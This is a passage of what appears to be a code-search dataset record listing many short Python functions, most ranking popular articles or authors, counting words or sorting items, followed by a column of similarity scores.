print_all_items_in_dict(author_count)", "def topAuthors():\n c = db.cursor()\n c.execute(\"select name, sum(hits) as hits\\\n from authorhits group by name\\\n order by hits desc;\")\n results = c.fetchall()\n c.close()\n return results", "def analyze(url):\n\n #Note : Using the function to count repeated words and sorted by value\n\n print('\\n\\nVisiting',url)\n print('The most 25 common word')\n print('\\n{:30} {:6}\\n'.format('Word','Count'))\n\n content = urlopen(url).read().decode()\n collector = Collector(url)\n collector.feed(content)\n urls = collector.getLinks()\n\n words_lst = collector.getdata()\n print(words_lst)\n # word_count = Counter(words_lst) # use collection\n # most_25_common = word_count.most_common(25) #\n\n word_count = frequency(words_lst)\n sorted_word_count = 
sorted(word_count.items(), key = lambda x : x[1],reverse= True)\n\n for word,count in sorted_word_count[:25]:\n print ('{:30}{:5}'.format(word,count))\n\n #return word_count\n\n # for word,count in most_25_common:\n # print('{:30} {:5}'.format(word,count))\n # return urls", "def article_stats(s_list,subject):\n word_dicts = {languages[0]:{},languages[1]:{}}\n stats = [subject]\n for i,article in enumerate(s_list):\n word_dicts[languages[i]] = get_words(article)\n wc = total_wc(word_dicts[languages[i]])\n stats.append((wc,avg_word_length(article, wc),avg_par_length(article)))\n stats.append(compute_similarity(word_dicts[languages[0]],word_dicts[languages[1]]))\n return stats", "def query1():\n\n print(\"1. What are the most popular three articles of all time? Which \" +\n \"articles have been accessed the most?\\n\")\n\n query = \"\"\"\n SELECT articles.title, subq.hits FROM articles\n LEFT JOIN\n (SELECT COUNT(log.path) AS hits, log.path FROM log\n WHERE log.path LIKE '/article/%'\n AND log.status = '200 OK' AND log.method = 'GET'\n GROUP BY log.path) AS subq\n ON subq.path LIKE '/article/'||articles.slug\n ORDER BY subq.hits DESC LIMIT 3;\n \"\"\"\n\n response = db_query(query)\n\n for i, j in enumerate(response):\n # Convert tuple to list to allow writing. Format \"hits\" with comma\n # seperator. Print output.\n j = list(j)\n j[1] = str(format(j[1], ',d'))\n print(\" Title: '{}' - {} views\".format(*j))", "def get_pybites_top_tags_using_feedparser(n=10):\n # TODO: For some reason this function gives one single false count:\n # All counts are according to the tests EXCEPT \"python\". This function\n # gives a count of 78, whereas the tests expect 79.\n # Opening the raw xml file in an editor we see indeed 79 matches for\n # \"<category>python</category>\".\n # Solution: rewrite the function to just do a text search like the text\n # editor. ^-^\n\n feed = feedparser.parse(content)\n tags_counter = Counter()\n for entry in feed.entries:\n for tag in entry.tags:\n tags_counter.update([tag.term])\n return tags_counter.most_common(n)", "def printTopAuthors():\n query = \"\"\"\n SELECT author_article_popularity_view.author,\n SUM(author_article_popularity_view.views) AS total_views\n FROM author_article_popularity_view\n GROUP BY author_article_popularity_view.author\n ORDER BY total_views DESC;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop authors of all time: \")\n for i, result in enumerate(results):\n print(\"{}. 
{} - {:,} views\".format(i + 1, result[0], result[1]))", "def top_50():\r\n file_read = read_file()\r\n vacabulary_list = []\r\n for key in file_read:\r\n vacabulary_list.extend(file_read[key])\r\n top_50 = Counter(vacabulary_list).most_common(50)\r\n return (top_50)", "def popular():\r\n d = data_loader.vid_patient_tuples_dict\r\n most_popular_videos = []\r\n for k in sorted(d, key=lambda k: len(d[k]), reverse=True):\r\n most_popular_videos.append(k)\r\n return most_popular_videos", "def print_popular_authors(authors):\n for (author, views) in authors:\n print \"%s - %d views\" % (author, views)", "def latest_content(request):\n latest_articles = Article.published_articles()[:5]\n latest_comments = Comment.objects.all().order_by('-pub_date')[:5]\n tags = Tag.objects.annotate(num_articles=Count('article')).order_by(\n '-num_articles')\n contributors = Contributor.objects.annotate(\n num_articles=Count('article')).order_by('-num_articles')\n return {'latest_articles': latest_articles,\n 'latest_comments': latest_comments,\n 'tags': tags,\n 'contributors': contributors,\n }", "def most_frequent_train(train_data):\n ### YOUR CODE HERE\n tags_counts_for_each_word = {}\n # Filling a dictionary from words and tag tags to their counters\n # Going over the words and counting their tags appearances\n for sentance in train_data:\n for word, tag in sentance:\n # If first time seeing word, adding it's tags count dictionary\n if word not in tags_counts_for_each_word:\n tags_counts_for_each_word[word] = {}\n # Fetching word tags count dictionary\n word_tags_count_dictionary = tags_counts_for_each_word[word]\n # If tag not in word's tags dictionary, initializing the counter\n if tag not in word_tags_count_dictionary:\n word_tags_count_dictionary[tag] = 0\n # Incrementing word tag counter\n word_tags_count_dictionary[tag] += 1\n \n words_maximal_tags = {}\n # Going over each word and finding it's maximal tag\n for word in tags_counts_for_each_word:\n # Fetching all word tags counts\n word_tags_count_dictionary = tags_counts_for_each_word[word]\n \n maximal_tag, maximal_tag_counter = '', 0\n # Finding word tag with maximal tag counter\n for curent_tag, current_counter in word_tags_count_dictionary.items():\n if current_counter > maximal_tag_counter:\n maximal_tag, maximal_tag_counter = curent_tag, current_counter\n \n # Setting the maximal tag for current word\n words_maximal_tags[word] = maximal_tag\n \n return words_maximal_tags\n ### END CODE HERE", "def most_popular_artist(our_data):\n counter_dict = {}\n for artist in all_artists(our_data):\n if artist in counter_dict:\n counter_dict[artist] += 1\n else:\n counter_dict[artist] = 1\n maximum_albums = max(counter_dict.values())\n artist_lists = []\n for keys, values in counter_dict.items():\n if values == maximum_albums:\n artist_lists.append(keys) \n return artist_lists", "def get_articles(self):\n\t\tarticles = Blog.objects.all()\\\n\t\t\t.filter(publication_date__lte=datetime.date.today())\\\n\t\t\t.order_by('publication_date')\n\t\ti = random.randint(0, articles.count()-1)\n\t\treturn articles, articles[i]", "def process_article(title):\n strings = []\n for lang in languages:\n strings.append(get_page(title,lang))\n return article_stats(strings,title)", "def get_most_popular_posts():\n popular_posts_ids = [post.id for post in Post.objects.popular()]\n return Post.objects.filter(id__in=popular_posts_ids). \\\n add_comments_count(). \\\n prefetch_related('author'). \\\n prefetch_with_tags_and_likes(). 
\\\n order_by('likes_count')", "def get_most_popular_talks_by_views(videos):\r\n return sorted(videos, key=lambda x: int(x.metrics['viewCount']), reverse=True)", "def top_by_ratings(self, n, metric=average):\n return top_movies", "def testArticleCount(self):\n\n self.articleCount(17)", "def top_python_questions(url=cached_so_url):\n content = load_page(url)\n soup = BeautifulSoup(content)\n questions = [(question.select_one('a.question-hyperlink').string.strip(),\n int(question.select_one('span.vote-count-post').string.strip()))\n for question in soup.find_all(class_='question-summary')\n if question.select_one('div.views').string.strip().endswith('m views')]\n return sorted(questions, key=lambda x: -x[1])", "def summary(self, *args, **kwargs):\n article = self.get_object()\n summary_data = self.get_serializer(article).data\n\n keywords = summary_data['keywords']\n related_articles = \\\n Article.objects.filter(Q(keywords__contains=keywords[:1])\n | Q(keywords__contains=keywords[1:2])\n | Q(keywords__contains=keywords[2:3])) \\\n .order_by('-publish_time')[:11] \\\n .values('identifier', 'title', 'images', 'site_name', 'domain', 'publish_time')\n\n related_articles = [related for related in list(related_articles)\n if related['identifier'] != article.identifier]\n\n summary_data['related'] = related_articles\n\n return Response(summary_data)", "def get_top_keywords_from_articles(self, kwords_list):\n _all_keywords = []\n for a in kwords_list:\n if a != []:\n for w in a:\n _all_keywords.append([w['keyword'],w['weight'],w['label']])\n _df_g = pd.DataFrame(_all_keywords, columns=[\"Keyword\", \"Count\",\"Label\"])\n _df_g.sort_values(by=\"Count\", inplace=True, ascending=False)\n _df_g.reset_index(drop=True, inplace=True)\n _df_g.to_csv('test.csv')\n print(len(_df_g))\n\n _df_g['Keyword'] = _df_g['Keyword'].apply(self.remove_repeat_words)\n _df_g.dropna(axis=0, inplace=True)\n p1,p2 = self.pos_taggers(_df_g)\n _df_g['c_POS'] = p1\n _df_g['s_POS'] = p2\n _df_g['c_POS_score'] = _df_g['c_POS'].apply(self.combine_pos_score)\n _df_g['s_POS_score'] = _df_g['s_POS'].apply(self.specific_pos_score)\n _df_g['Count'] = _df_g['Count'] + _df_g['c_POS_score'] + _df_g['s_POS_score'] \n print(len(_df_g))\n _df_g.sort_values(by='Count',inplace=True, ascending=False)\n print(len(_df_g))\n _df_g = _df_g.reset_index(drop=True)\n _df_g = _df_g[:10]\n response_dict = dict()\n response_dict['nc'] = \", \".join(_df_g['Keyword'].to_list())\n return response_dict", "def find_frequent_words(words, most_frequent): \n \n # common_words = Counter(sorted(words))\n # print common_words\n common_words = Counter(sorted(words)).most_common(most_frequent)\n print (common_words )\n most_common_words = [w for w, w_count in common_words]\n return most_common_words", "def get_top_news_and_the_rest(self):\n queryset = self.news.order_by('-marked', '-publication_date')\n return queryset.first(), queryset[1:]", "def most_words(self, n):\n return big_tags", "def get_pageranks(articles, skip_zeros=False, ambiguous_only=False, ambiguous_forms=set()):\n pageranks = {}\n pagerank_frequency=defaultdict(int)\n\n pr_uniq_sets=defaultdict(set)\n for article in articles:\n for mention in article.entity_mentions:\n if ambiguous_only and mention.mention not in ambiguous_forms:\n continue\n h=int(mention.gold_pr/1)\n if not skip_zeros or h!=0:\n pagerank_frequency[h]+=1\n pr_uniq_sets[h].add(mention.gold_link)\n pageranks[mention.gold_link]=h\n pr_uniq=defaultdict(int)\n for k,v in pr_uniq_sets.items():\n pr_uniq[k]=len(v)\n return 
pagerank_frequency, pr_uniq, pageranks", "def top_python_questions(url=cached_so_url):\n response = requests.get(url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n ge_1m = []\n lt_1m = []\n\n question_summary = soup.find_all(\"div\", class_=\"question-summary\")\n for question in question_summary:\n views = int(question.find(\"div\", class_=\"views\").get(\"title\").split(\" \")[0].replace(\",\", \"\"))\n _question = question.find(\"a\", class_=\"question-hyperlink\").get_text()\n votes = int(question.find(\"span\", class_=\"vote-count-post\").get_text())\n \n if views >= 1000000:\n ge_1m.append((_question, votes))\n else:\n lt_1m.append((_question, votes))\n\n return sorted(ge_1m, key=lambda x: x[1], reverse=True)", "def get_relevant_articles_tf_idf(self, title, k):\n\n\n inner_product=0\n distances=list()\n for article in self.tf_idf:\n if not article==title:\n angle=self.angle_finder(self.tf_idf[title], self.tf_idf[article])\n distances.append((article, math.acos(angle)))\n distances=sorted(distances, key=lambda tup: tup[1])\n print (distances[:k])\n return distances[:k]", "def get_most_popular_talks_by_like_ratio(videos):\n return sorted(videos, key=get_ratio, reverse=True)", "def num_articles(self):\n\t\treturn len(index)", "def get_top_nationalities(result, n=5):\n nat_freq=pd.DataFrame(result['country'].value_counts())\n ratios=nat_freq[:n]/nat_freq.sum()*100\n res='The most common visitors are from'\n for i in range(0,len(ratios)):\n if i!=len(ratios)-1:\n res=res+f' {ratios.index[i]} ({np.round(ratios.country[i],2)}%),'\n else:\n res=res+f' and {ratios.index[i]} ({np.round(ratios.country[i],2)}%).'\n return res", "def get_top_featured_entries(number=5):\n return list(Entry.published.filter(featured=True)[:number])", "def print_top_authors():\n\n output = get_query_results(\n '''SELECT authors.name, COUNT(*) AS views\n FROM authors\n JOIN(SELECT articles.title, articles.author FROM articles\n JOIN log ON log.path=CONCAT('/article/', articles.slug))\n AS popular\n ON authors.id=popular.author\n GROUP BY name\n ORDER BY views DESC;'''\n )\n print(\"\\nPopularity of Authors: \\n\")\n for author, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(author, views))", "def top_by_num_of_ratings(self, n):\n return top_movies", "def _get_new_article(pages):\n date = arrow.now().replace(days=-30).format('YYYY-MM-DD')\n pages = [p for p in pages if p.created > date]\n\n skips = [p for p in pages if 'scp' in p.tags and p.rating >= 40]\n tales = [p for p in pages if 'tale' in p.tags and p.rating >= 20]\n goi = [p for p in pages if 'goi-format' in p.tags and p.rating >= 20]\n pages = skips + tales + goi\n\n return random.choice(pages) if pages else None", "def get_next_articles(self):\n\t\tarticles = Blog.objects.all()\\\n\t\t\t.filter(publication_date__lte=datetime.date.today())\\\n\t\t\t.order_by('publication_date')\n\n\t\tif articles.count() <= 4:\n\t\t\treturn articles\n\n\t\ti, j, k, l = random.sample(range(0, articles.count()-1), 4)\n\t\treturn [articles[i], articles[j], articles[k], articles[l]]", "def personal_top_three(scores):\n return sorted(scores, reverse=True)[:3]", "def personal_top_three(scores):\n return sorted(scores, reverse=True)[:3]", "def get_instance_distribution(articles, instance):\n references = defaultdict(int)\n for article in articles:\n for mention in article.entity_mentions:\n form=mention.mention\n meaning=mention.gold_link\n if meaning==instance:\n references[form]+=1\n return sorted(references.items(), key=lambda x: x[1], reverse=True)", "def 
get_top_authors():\n query2 = \"\"\"select name, count(*) as views\n from authors, articles, log\n where authors.id = articles.author\n and log.path like '%' || articles.slug\n group by name\n order by views desc;\"\"\"\n results = execute_query(query2)\n for result in results:\n print(\"- %s — %s views\" % (result[0], result[1]))" ]
[ "0.7968826", "0.77808386", "0.7766518", "0.77630246", "0.7703104", "0.7636034", "0.7507648", "0.7505851", "0.74948984", "0.7427754", "0.74145854", "0.71255904", "0.71188134", "0.7111447", "0.7081126", "0.7029817", "0.69994766", "0.6986983", "0.69304246", "0.6920505", "0.6882535", "0.68230313", "0.67415947", "0.6712437", "0.66118187", "0.6596079", "0.65192574", "0.6506484", "0.6456639", "0.6433427", "0.64259905", "0.64207137", "0.6364805", "0.6324833", "0.629801", "0.6262481", "0.61925775", "0.6190417", "0.6179566", "0.6150143", "0.61290365", "0.6120968", "0.61168694", "0.6095613", "0.6053071", "0.6053071", "0.60371464", "0.60055846", "0.5970011", "0.5938313", "0.59339416", "0.59210694", "0.5919213", "0.59148544", "0.590489", "0.5862792", "0.5812729", "0.5808571", "0.5805504", "0.5796127", "0.57864845", "0.57820755", "0.5749477", "0.57468516", "0.57427174", "0.5729018", "0.57207364", "0.571516", "0.57127184", "0.56940734", "0.5668858", "0.5660749", "0.5658229", "0.5649712", "0.5647527", "0.5620981", "0.5620474", "0.5601826", "0.5591498", "0.55583394", "0.55423224", "0.55287135", "0.5520212", "0.55069286", "0.55037457", "0.54909277", "0.549083", "0.5481573", "0.547718", "0.5469407", "0.5459685", "0.5455319", "0.54517835", "0.5450417", "0.5448972", "0.5447352", "0.5432765", "0.5432765", "0.54296845", "0.5419315" ]
0.7005649
16
Who are the most popular article authors of all time?
def getPopularAuthors():
    # Rank authors by total page views across all of their articles.
    db = psycopg2.connect("dbname=news")
    c = db.cursor()
    c.execute(
        "select count(*) as views, authors.name from articles "
        "inner join log on concat('/article/', articles.slug) = log.path "
        "inner join authors on articles.author = authors.id "
        "group by name order by views desc;")
    authors = c.fetchall()
    db.close()
    return authors
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_mostPopularAuthors():\n\n query = \"\"\"\n SELECT authors.name,COUNT(*) as views\n FROM articles join authors\n ON articles.author=authors.id\n JOIN log ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY authors.name\n ORDER BY views DESC\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWho are the most popular article authors of all time?')\n for author, views in posts:\n print(author + \" - \" + str(views) + \" views\")", "def most_popular_authors():\n\n results = query_database(QUERIES[1])\n print('\\nWho are the most popular article authors of all time?\\n')\n for author, views in results:\n print(' * {} -- {} views'.format(author, views))", "def most_popular_authors():\n print '2. The most popular authors are...'\n return (\"\"\"SELECT authors.name, count(*) as num from\"\"\"\n \"\"\" authors, articles, log WHERE SUBSTRING (log.path FROM 10)\"\"\"\n \"\"\" = articles.slug and articles.author = authors.id and\"\"\"\n \"\"\" log.path != '/' Group By authors.name ORDER by num\"\"\"\n \"\"\" DESC LIMIT 20;\"\"\")", "def most_popular_article_authors():\n\n # To print information\n information_string = '2. The most popular article ' \\\n 'authors of all time are:\\n'\n\n # Query string\n query = \"\"\" select x.author , count(1) as qtd from (\n SELECT b.name as author\n FROM articles a join authors b on(a.author = b.id)\n join log c on(c.path = '/article/' ||a.slug)\n ) x group by x.author order by 2 desc;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t' + str(result[0]) + ' - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def popular_authors() :\n query = \"\"\"SELECT authors.name,count(*) AS total_views FROM authors,articles,log WHERE log.path like concat ('/article/',articles.slug)\n AND articles.author=authors.id group by authors.name order by total_views desc\"\"\"\n result = get_data(query)\n print(\" 2. 
The most popular articles authors of all time:\")\n print(\"\")\n for record in result :\n print(' ' +' ' + str(record[0]) + ' -' + ' ' + str(record[1]) + ' ' +'views')\n print(\" \")", "def top_authors():\n\n cur.execute(\"\"\"\n SELECT author, count(*) AS article_author\n FROM article_summary\n GROUP BY author\n ORDER BY article_author DESC;\n \"\"\")\n result = cur.fetchall()\n return result", "def get_most_popular_authors():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\" select t1.name,count(*) as total from authors as t1, articles as t2,log as t3 where t3.path=concat('/article/',t2.slug) and t1.id=t2.author group by t1.name order by total desc limit 3;\")\n\tdata = c.fetchall()\n\tdb.close()\n\n\treturn data", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_authors = \"\"\"\n SELECT aut.name, COUNT(lg.id) AS views\n FROM articles AS art\n JOIN log AS lg ON art.slug = SUBSTRING(lg.path,10)\n AND lg.status = '200 OK'\n JOIN authors AS aut ON aut.id = art.author\n GROUP BY aut.name\n ORDER BY views desc; \"\"\"\n c.execute(query_popular_authors)\n authors = from_db_cursor(c)\n db.close()\n return authors", "def popular_authors():\n query = \"\"\"select authors.name, sum(views)\n from authors, articles, article_path_views\n where authors.id = articles.author\n and '/article/' || articles.slug = article_path_views.path\n group by authors.name\n order by sum desc\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"Authors and Their Articles' Total Views:\\n\" + report", "def author_rank():\n db, c = connect(DBNAME)\n c.execute(\"select name, count(name) as views from \\\"authorpath\\\" \"\n \"group by name order by views desc\")\n author_table = c.fetchall()\n db.close()\n print \"\\nMost Popular Article Authors of All Time:\"\n for author in author_table:\n print str(author[0]) + \" - \" + str(author[1]) + \" views\"", "def most_viewed_authors():\n query = \"\"\"\n SELECT authors.name, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n JOIN authors\n ON authors.id = articles.author\n WHERE log.status ='200 OK'\n GROUP BY authors.name ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed authors:\")\n for result in results:\n print '{author} - {count} views'.format(\n author=result[0], count=result[1])", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select authors.name, count(*) as num \"\n \"from articles, authors, log \"\n \"where articles.author = authors.id \"\n \"and log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by authors.name order by num desc\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The most popular authors of all time are:\\n\\n\")\n # for loop to print each author\n for name, num in results:\n text_file.write(\"\\\"\" + name + \"\\\"\" + \" - \" + str(num) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def print_top_authors():\n\n output = get_query_results(\n '''SELECT authors.name, COUNT(*) AS views\n FROM authors\n JOIN(SELECT articles.title, articles.author FROM articles\n JOIN log ON log.path=CONCAT('/article/', articles.slug))\n AS popular\n ON 
authors.id=popular.author\n GROUP BY name\n ORDER BY views DESC;'''\n )\n print(\"\\nPopularity of Authors: \\n\")\n for author, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(author, views))", "def get_top_authors():\n query2 = \"\"\"select name, count(*) as views\n from authors, articles, log\n where authors.id = articles.author\n and log.path like '%' || articles.slug\n group by name\n order by views desc;\"\"\"\n results = execute_query(query2)\n for result in results:\n print(\"- %s — %s views\" % (result[0], result[1]))", "def print_popular_authors(authors):\n for (author, views) in authors:\n print \"%s - %d views\" % (author, views)", "def printTopAuthors():\n query = \"\"\"\n SELECT author_article_popularity_view.author,\n SUM(author_article_popularity_view.views) AS total_views\n FROM author_article_popularity_view\n GROUP BY author_article_popularity_view.author\n ORDER BY total_views DESC;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop authors of all time: \")\n for i, result in enumerate(results):\n print(\"{}. {} - {:,} views\".format(i + 1, result[0], result[1]))", "def topAuthors():\n c = db.cursor()\n c.execute(\"select name, sum(hits) as hits\\\n from authorhits group by name\\\n order by hits desc;\")\n results = c.fetchall()\n c.close()\n return results", "def most_popular_articles():\n print '1. The most popular articles are...'\n return (\"\"\"SELECT articles.title, COUNT(*) as num FROM articles, log\"\"\"\n \"\"\" WHERE SUBSTRING (log.path FROM 10) = articles.slug and\"\"\"\n \"\"\" log.path != '/' Group By articles.title ORDER By num\"\"\"\n \"\"\" DESC LIMIT 3;\"\"\")", "def most_popular_articles():\n\n results = query_database(QUERIES[0])\n print('\\nWhat are the most popular three articles of all time?\\n')\n for title, views in results:\n print(' * \"{}\" -- {} views'.format(title, views))", "def print_popular_authors():\n print(\"\\nAuthors listed by article views:\\n\")\n views_data = get_query_results(AUTHORS_VIEWS_QUERY)\n author_row_format = '{} - {} views'\n for author, views in views_data:\n print(author_row_format.format(author, views))", "def top_authors(cursor):\n top_auth = 'No authors found.'\n try:\n cursor.execute(\"\"\"\n select name, hits\n from authors, views_by_id as views_by_id\n where id = author\n group by name, hits\n order by hits desc\"\"\")\n\n authors = cursor.fetchall()\n # If no authors were found, return\n if len(authors) <= 0:\n return top_auth\n\n except psycopg2.Error as e:\n print('Fetching authors by popularity: \\r\\n{}'.format(e.pgerror))\n\n # If the query returns any authors, return the results.\n else:\n top_auth = 'Top authors by article views: \\r\\n'\n for auth in authors:\n top_auth += ' {} - {} views\\r\\n'.format(auth[0], auth[1])\n return top_auth", "def get_mostViewedArticles():\n\n query = \"\"\"\n SELECT articles.title,COUNT(*) as views\n FROM articles JOIN log\n ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY articles.title\n ORDER BY views DESC\n LIMIT 3\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWhat are the most popular three articles of all time?')\n for title, views in posts:\n print(title + \" - \" + str(views) + \" views\")", "def print_top_articles():\n\n output = get_query_results(\n '''SELECT articles.title, COUNT(path) AS views\n FROM articles\n JOIN log\n ON log.path=CONCAT('/article/', articles.slug)\n GROUP BY title\n ORDER BY views DESC\n LIMIT 3;'''\n )\n print(\"\\nMost Popular Articles: \\n\")\n for 
title, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(title, views))", "def get_popular_authors():\n query_command = \"SELECT * from popular authors LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def popular_articles():\n query = \"\"\"SELECT articles.title,count(*) AS total_views FROM articles,log WHERE log.path like concat('/article/',articles.slug)\n group by articles.title order by total_views desc limit 3\"\"\"\n result = get_data(query)\n print(\" 1. The most popular three articles of all time:\")\n print(\"\")\n for record in result :\n print(' ' + '\\\"' + str(record[0]) + '\\\"' + '-' + ' ' + str(record[1]) + ' '+ 'views')\n print(\" \")", "def get_most_popular_articles():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\"select t2.title, count(*) as total from log as t1,articles as t2 where t1.path=concat('/article/',t2.slug) group by t2.title order by total desc limit 3 ;\")\n\tdata = c.fetchall()\n\tdb.close()\n\treturn data", "def most_viewed_articles():\n query = \"\"\"\n SELECT articles.title, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n WHERE log.status ='200 OK'\n GROUP BY articles.title ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed articles:\")\n for result in results:\n print '{article} - {count} views'.format(\n article=result[0], count=result[1])", "def count_by_author(all_articles):\n author_count = {}\n\n for title in all_articles:\n author = \", \".join(all_articles[title]['authors'])\n if author not in author_count:\n author_count[author] = 1\n else:\n author_count[author] = author_count[author] + 1\n \n print_all_items_in_dict(author_count)", "def article_rank():\n db, c = connect(DBNAME)\n c.execute(\"select title, count(title) as views from \\\"pathslug\\\" \"\n \"group by title order by views desc limit 3\")\n article_table = c.fetchall()\n db.close()\n print \"\\nThree Most Popular Articles All Time:\"\n for article in article_table:\n print str(article[0]) + \" - \" + str(article[1]) + \" views\"", "def print_popular_articles(articles):\n for (title, views) in articles:\n print \"\\\"%s\\\" - %d views\" % (title, views)", "def print_authors(popular_authors):\n\n print('\\nThe list of authors being listed as per their popularity:\\n')\n for author in popular_authors:\n print(author[0] + '\\t-\\t' + str(author[1]) + ' views \\n')\n print('-------------------------------------------------------\\n')", "def popular_articles():\n db = psycopg2.connect(\"dbname=news\")\n \"\"\"Connect to news database.\"\"\"\n c = db.cursor()\n \"\"\"Open a cursor to perform database operation.\"\"\"\n query = \"\"\"select title, count(path) as view from articles, log \n where '/article/' || articles.slug = log.path group by title, path \n order by view desc limit 3;\"\"\"\n \"\"\"The cursor runs query and fetches result.\"\"\"\n c.execute(query)\n \"\"\"Execute query using cursor.\"\"\"\n rows = c.fetchall()\n print \"Most popular three articles of all time: \"\n print \"---------------------------------------- \"\n for row in rows:\n print row[0], \"--\", row[1], \" views\"\n db.close()", "def three_most_popular_articles():\n\n # To print information\n information_string = '1. 
The 3 most popular articles of all time are:\\n'\n\n # Query string\n query = \"\"\"select title,count(*) as num from\n articles,log where\n log.path=CONCAT('/article/',articles.slug)\n group by articles.title\n order by num DESC limit 3;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t\"' + str(result[0]) + '\" - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def query_article():\r\n conn, cur = connect()\r\n query1 = (\"select * from article limit 3\")\r\n cur.execute(query1)\r\n res = cur.fetchall()\r\n conn.close()\r\n print (\"\\nThe most popular three articles of all time:\\n\")\r\n for i in range(0, len(res), 1):\r\n print (res[i][0] + \" --> \" + str(res[i][1]) + \" views\")", "def recommend_for_new_user(titles=False, n_max=10):\n return reader.UserList().get_most_popular_articles(titles=titles)[: n_max]", "def get_popular_articles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_articles = \"\"\"\n SELECT art.title, COUNT(lg.id) as views\n FROM articles as art\n JOIN log as lg\n ON art.slug = substring(lg.path,10)\n AND lg.status = '200 OK'\n GROUP BY art.title\n ORDER BY views desc\n LIMIT 3; \"\"\"\n c.execute(query_popular_articles)\n articles = from_db_cursor(c)\n db.close()\n return articles", "def print_popular_articles():\n print(\"3 most popular articles\\n\")\n popularity_data = get_query_results(POPULARITY_QUERY)\n article_row_format = '\"{}\" — {} views'\n for title, views in popularity_data:\n print(article_row_format.format(title, views))", "def top3_articles():\n\n cur.execute(\"\"\"\n SELECT title, COUNT(*) AS article_title\n FROM article_summary\n GROUP BY title\n ORDER BY article_title DESC\n LIMIT 3;\n \"\"\")\n result = cur.fetchall()\n return result", "def print_top_articles(popular_articles):\n\n print('\\nThe three top most articles viewed are:\\n')\n for article in popular_articles:\n print(article[0] + '\\t-\\t' + str(article[1]) + ' views \\n')\n print('-------------------------------------------------------\\n')", "def getPopularArticles():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n c.execute(\" select count (*) as views, title from articles \"\n + \"left join \"\n + \"log on concat('/article/', articles.slug) = log.path \"\n + \"group by title order by views desc limit 3\")\n views = c.fetchall()\n db.close()\n return views", "def most_similar(self, article: str, topn: int = 5):\n return [article[0] for article in self._model.similar_by_word(article, topn)]", "def how_popular_most_popular(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_count", "def printTopThreeArticles():\n query = \"\"\"\n SELECT author_article_popularity_view.article,\n author_article_popularity_view.views\n FROM author_article_popularity_view\n LIMIT 3;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop 3 articles of all time: \")\n for i, result in enumerate(results):\n 
print(\"{}. \\\"{}\\\" - {:,} views\".format(i + 1, result[0], result[1]))", "def get_popular_titles():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select articles.title, count(*) as views \"\n \"from articles, log \"\n \"where log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by articles.title \"\n \"order by views desc limit 3\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The three most popular articles of all time are:\\n\\n\")\n # for loop to print each article\n for title, views in results:\n text_file.write(\"\\\"\" + title + \"\\\"\" + \" - \" + str(views) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def topArticles():\n c = db.cursor()\n c.execute(\"select titles.title, tophits.hits\\\n from tophits, titles\\\n where tophits.path = titles.slug\\\n order by hits desc limit 3;\")\n results = c.fetchall()\n c.close()\n return results", "def print_top_authors():\n\n create_view_top_articles = (\n \"CREATE VIEW top_articles AS \" +\n \"SELECT COUNT(path) AS num, path \" +\n \"FROM log GROUP BY path ORDER BY num DESC;\")\n create_view_top_authors = (\n \"CREATE VIEW top_authors as \" +\n \"SELECT sum(num) as views, author \" +\n \"FROM top_articles, articles \" +\n \"WHERE top_articles.path LIKE '%' || articles.slug GROUP BY author;\")\n get_popular_artists = (\n \"SELECT name, views \" +\n \"FROM authors, top_authors \" +\n \"WHERE top_authors.author = authors.id ORDER BY views DESC;\")\n\n print(\"\\nRunning 